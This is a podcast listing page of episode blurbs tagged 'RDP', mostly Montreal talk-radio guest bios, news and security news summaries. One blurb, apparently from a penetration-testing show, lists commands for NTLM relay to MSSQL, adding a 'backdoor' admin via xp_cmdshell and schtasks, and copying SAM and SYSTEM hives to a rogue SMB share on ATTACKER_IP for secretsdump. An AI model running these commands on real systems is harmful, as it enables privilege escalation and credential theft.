Podcasts about RDP

We take a Loss in disappointing fashion again Charlotte FC. Is it time to panic?#MLS #InterMiamiCF #Messi #InterMiami

Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/. I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can't explain is the first relay got me a shell in the context of NT SERVICEMSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITYSYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance". Turns out a DA wasn't interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn't copy reg hives out of it – EDR was unhappy. In the end, the bizarre combo of things that did the trick was: Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' From the victim system, I did an mklink to the shadow copy: mklink /d C:tempbackup ?GLOBALROOTDeviceHarddiskVolumeShadowCopy123 From command prompt on the victim system, I authenticated to my rogue share: net use ATTACKER_IPshare /user:toteslegit DontMindMeLOL! Then I did a copy command for the first hive: copy SYSTEM my.attackingipsys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!! Finishing move: secretsdump -sam sam.test -system sys.test LOCAL

Rui Rodrigues, Retail Council of Canada Executive Advisor

Amanda Lang, CTV News Chief Financial Correspondent.

Political commentator James Mennie is a reporter, columnist and editor at the Montreal Gazette. He can be heard weekdays at 4:05 p.m. on Montreal Now with Aaron Rand.

CJAD 800 political commentator Tom Mulcair can be heard regularly on Montreal Now with Aaron Rand in addition to The Andrew Carter Morning Show, every weekday at 7:40 a.m.

Tech analyst and journalist Carmi Levy can be heard regularly on Montreal Now with Aaron Rand as well as CTV News.

Raphaël Melançon, political analyst for Noovo and CTV Montreal. He is also the president and founder of Trafalgar Strategies.

Charles Burton, former diplomat at Canada’s embassy in Beijing and senior fellow at the think tank Sinopsis

Denis Hamel, strategic advisor at the Conseil du patronat du Quebec Christina Santini, Director of National Affairs at the Canadian Federation of Independent businesses

Political commentator James Mennie is a reporter, columnist and editor at the Montreal Gazette. He can be heard weekdays at 4:05 p.m. on Montreal Now with Aaron Rand.

Scott Reid, CTV Political Analyst and former advisor to Prime Minister Paul Martin.

Emmy and Golden Globe–winning Canadian actor and musician Kiefer Sutherland is best known for his starring role as Jack Bauer in the 24 series. He recently released a line of Canadian whisky, Red Bank Whisky. He spoke to Aaron Rand.

Political commentator James Mennie is a reporter, columnist and editor at the Montreal Gazette. He can be heard weekdays at 4:05 p.m. on Montreal Now with Aaron Rand.

CJAD 800 legal contributor Chris Dimakos is a lawyer and managing partner at Dimakos Law Group. He can be heard regularly on Montreal Now with Aaron Rand.

Anthony Housefather, Liberal MP for Mount Royal Image: THE CANADIAN PRESS/Adrian Wyld

Dr. Joe Schwarcz, Host of the Dr. Joe Show, Sundays at 3 PM on CJAD 800 & director of the McGill Office for Science & Society.

Political commentator James Mennie is a reporter, columnist and editor at the Montreal Gazette. He can be heard weekdays at 4:05 p.m. on Montreal Now with Aaron Rand.

Rudy Husny, former advisor in the Harper government and political analyst.

Most people think progress comes from harder workouts. The truth? Progress comes from better feedback. In this Red Delta Project Podcast, i'll show you how to become your own coach using three free apps you already have: 1. Camera app – film a set to spot technical erosion and fix form fast. 2. Notes/Docs app – keep an adaptive training log to observe → assess → plan (Double-Tap Training ready). 3. Timer app – structure work/rest, regulate intensity, and boost productivity without counting reps.You'll learn how to stop running in circles, make smarter changes, and get more results with less wasted effort—all while staying true to the RDP philosophy: Be Fit. Live Free.

Trudie Mason, in for Elias Makos, is joined by Paul Gott, Lead singer and guitarist for Montreal Punk Rock band the Ripcordz and a journalism professor at Concordia and Political analyst Karim Boulos on The Big 5. The Labour vote has split across different political parties… The NDP isn’t the only one supporting worker rights anymore. People are headed to the street today to call for a general election in Quebec. Quebecers are encouraging people to take up two jobs to deal with increased cost of living.

Political commentator James Mennie is a reporter, columnist and editor at the Montreal Gazette. He can be heard weekdays at 4:05 p.m. on Montreal Now with Aaron Rand.

Ajay Pangarkar, Workforce Performance Strategist and author of “Learning Metrics: How to Measure the Impact of Organizational Learning.

Taras Grescoe, the author of Straphanger: Saving Our Cities and Ourselves from the Automobile.

Political analyst David Heurtel is a counsel at Fasken with experience in Government and Public Relations, Environment, Climate Change and Immigration. He can be heard regularly on Montreal Now with Aaron Rand.

Moshe Lander, senior lecturer in economics at Concordia University.

Stephen Brown, President of the National Council of Muslim Canadians and Henry Topaz, regional director for B’nai Brith Quebec and Atlantic Canada.

Political commentator James Mennie is a reporter, columnist and editor at the Montreal Gazette. He can be heard weekdays at 4:05 p.m. on Montreal Now with Aaron Rand.

CJAD 800 political commentator Tom Mulcair can be heard regularly on Montreal Now with Aaron Rand in addition to The Andrew Carter Morning Show, every weekday at 7:40 a.m.

Organizations today face escalating cyber risks spanning state-sponsored attacks, supply chain compromises, and malicious apps. ShinyHunters' breaches of Salesforce platforms (impacting Google and Farmers Insurance) show how social engineering—like voice phishing—can exploit trusted vendors. Meanwhile, Russian actors (FSB-linked “Static Tundra”) continue to leverage old flaws, such as a seven-year-old Cisco Smart Install bug, to infiltrate U.S. infrastructure. Malicious apps on Google Play (e.g., Joker, Anatsa) reached millions of downloads before removal, proving attackers' success in disguising malware. New technologies bring fresh vectors: Perplexity's Comet browser allowed prompt injection–driven account hijacking, while malicious RDP scanning campaigns exploit timing to maximize credential theft.Responses vary between safeguarding and asserting control. The FTC warns U.S. firms against weakening encryption or enabling censorship under foreign pressure, citing legal liability. By contrast, Russia mandates state-backed apps like MAX Messenger and RuStore, raising surveillance concerns. Microsoft, facing leaks from its bug-sharing program, restricted exploit code access to higher-risk countries. Open-source projects like LibreOffice gain traction as sovereignty tools—privacy-first, telemetry-free, and free of vendor lock-in.AI-powered wearables such as Halo X smart glasses blur lines between utility and surveillance. Their ability to “always listen” and transcribe conversations augments human memory but erodes expectations of privacy. The founders' history with facial recognition raises additional misuse concerns. As AI integrates directly into conversation and daily life, the risks of pervasive recording, ownership disputes, and surveillance intensify.Platforms like Bluesky are strained by conflicting global regulations. Mississippi's HB 1126 requires universal age verification, fines for violations, and parental consent for minors. Lacking resources for such infrastructure, Bluesky withdrew service from the state. This illustrates the tension between regulatory compliance, resource limits, and preserving open user access.AI adoption is now a competitive imperative. Coinbase pushes aggressive integration, requiring engineers to embrace tools like GitHub Copilot or face dismissal. With one-third of its code already AI-generated, Coinbase aims for 50% by quarter's end, supported by “AI Speed Runs” for knowledge-sharing. Yet, rapid adoption risks employee dissatisfaction and AI-generated security flaws, underscoring the need for strict controls alongside innovation.Breaches at Farmers Insurance (1.1M customers exposed) and Google via Salesforce illustrate the scale of third-party risk. Attackers exploit trusted platforms and human error, compromising data across multiple organizations at once. This shows security depends not only on internal defenses but on continuous vendor vetting and monitoring.Governments often demand access that undermines encryption, privacy, and transparency. The FTC warns that backdoors or secret concessions—such as the UK's (later retracted) request for Apple to weaken iCloud—violate user trust and U.S. law. Meanwhile, Russia's mandatory domestic apps exemplify sovereignty used for surveillance. Companies face a global tug-of-war between privacy, compliance, and open internet principles.Exploited legacy flaws prove that vulnerabilities never expire. Cisco's years-old Smart Install bug, still unpatched in many systems, allows surveillance of critical U.S. sectors. Persistent RDP scanning further highlights attackers' patience and scale. The lesson is clear: proactive patching, continuous updates, and rigorous audits are essential. Cybersecurity demands ongoing vigilance against both emerging and legacy threats.

Cape Breton's Ray and Jean Mackay recently celebrated 75 years of marriage. They spoke to Aaron Rand.

Tech analyst and journalist Carmi Levy can be heard regularly on Montreal Now with Aaron Rand as well as CTV News.

Political commentator James Mennie is a reporter, columnist and editor at the Montreal Gazette. He can be heard weekdays at 4:05 p.m. on Montreal Now with Aaron Rand.

Raphaël Melançon, a political analyst for Noovo and CTV Montreal. He is also the president and founder of Trafalgar Strategies.

Sarah Bensadoun, spokesperson for the Ministère des Transports et de la Mobilité durable and Mobilité Montréal Philippe Sabourin, City of Montreal spokesperson.

Evan Solomon, Minister of Artificial Intelligence and Digital Innovation.

Political analyst David Heurtel is a counsel at Fasken with experience in Government and Public Relations, Environment, Climate Change and Immigration. He can be heard regularly on Montreal Now with Aaron Rand.

Eric Girard, Minister of Finance and Minister Responsible for Relations with English-Speaking Quebecers

Mark Norman, retired Vice-Admiral with the Royal Canadian Navy.

Political commentator James Mennie is a reporter, columnist and editor at the Montreal Gazette. He can be heard weekdays at 4:05 p.m. on Montreal Now with Aaron Rand.

Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet, and more on the Security Weekly News. Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn-506

Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet, and more on the Security Weekly News. Show Notes: https://securityweekly.com/swn-506

Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet, and more on the Security Weekly News. Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn-506

Naughty RBG, Docker, RDP, SBOMS, Kullback-Leibler, Oneflip, Youtube, Josh Marpet, and more on the Security Weekly News. Show Notes: https://securityweekly.com/swn-506

Na Guiné-Bissau, Domingos Simões Pereira qualificou de muito mau a suspensão das emissões da RTP e RDP, e deposita a sua confiança nos jovens guineenses para lutar contra o estado atual do país. 12 anos depois, Angola voltou a vencer o Afrobasket e em casa. Os Estados Unidos da América estarão a usar o continente africano como uma zona de descarga para deixar migrantes ilegais?

Moçambique: Entrada de Venâncio Mondlane no diálogo nacional inclusivo é fundamental? Governo moçambicano trava partida de navio carregado com madeira para a China. Angola com greve à vista na imprensa pública? Guiné-Bissau: Governo continua sem dar explicação para a expulsão da RTP, RDP e Lusa.

Guiné-Bissau: Governo guineense determina a expulsão da Agência Lusa, da RDP e da RTP África do país. Moçambique: Ministério da Justiça aceita registo do partido ANAMOLA do ex-candidato presidencial Venâncio Mondlane. Presidentes dos Estados Unidos e da Rússia encontram-se no Alasca, para sondarem as possibilidades de se chegar ao fim da guerra na Ucrânia.

In this episode of Tech Talks Daily, I caught up with Raj Samani, Chief Scientist at Rapid7, to unpack the rapidly evolving world of ransomware. Raj has been on the front lines of cybercrime response for years and has seen firsthand how these attacks have professionalized. Gone are the days of casual ransomware notes asking for a few hundred dollars. Today, these groups operate like fully formed businesses with help desks, R&D teams, and carefully designed extortion models. We talked about how ransomware has become a reputational risk issue more than just a technical one. Raj shared that CEOs are often more concerned about data being exfiltrated and leaked to the press than they are about systems being locked down. It's no longer just about recovering files. It's about trust, public perception, and the long tail of brand damage. One of the most revealing parts of our discussion was how these attacks typically unfold. Raj walked me through real-world scenarios where criminals have remained inside networks for months, even years, before launching their final payload. He also described how careful planning, coordinated strike days, and threat intelligence can disrupt an attacker's kill chain before irreversible damage is done. We explored the uncomfortable truth that many organizations still fall victim to basic attacks because of poor cyber hygiene. While the threat landscape is becoming more sophisticated with the use of zero-day vulnerabilities and social engineering, many breaches still happen through exposed RDP ports or convincing phishing attempts. Raj also offered candid insights into the ethics and complexities of ransomware negotiations, why outright banning payments may backfire, and what companies should do in the first few hours after discovering they've been hit. He made it clear that cybersecurity is no longer just an IT issue. It affects everything from supply chains to public services and daily life. Is your organization prepared for the moment when ransomware moves from IT's concern to the boardroom's crisis?

DShield Honeypot Log Volume Increase Within the last few months, there has been a dramatic increase in honeypot log volumes and how often these high volumes are seen. This has not just been from Jesse s residential honeypot, which has historically seen higher log volumes, but from all of the honeypots that Jesse runs. https://isc.sans.edu/diary/DShield+Honeypot+Log+Volume+Increase/32100 Google and Microsoft Trusted Them. 2.3 Million Users Installed Them. They Were Malware. Koi Security s investigation of a single verified color picker exposed a coordinated campaign of 18 malicious extensions that infected a massive 2.3 million users across Chrome and Edge. https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5 RDP Forensics Comprehensive overview of Windows RDP Forensics https://medium.com/@mathias.fuchs/chasing-ghosts-over-rdp-lateral-movement-in-tiny-bitmaps-328d2babd8ec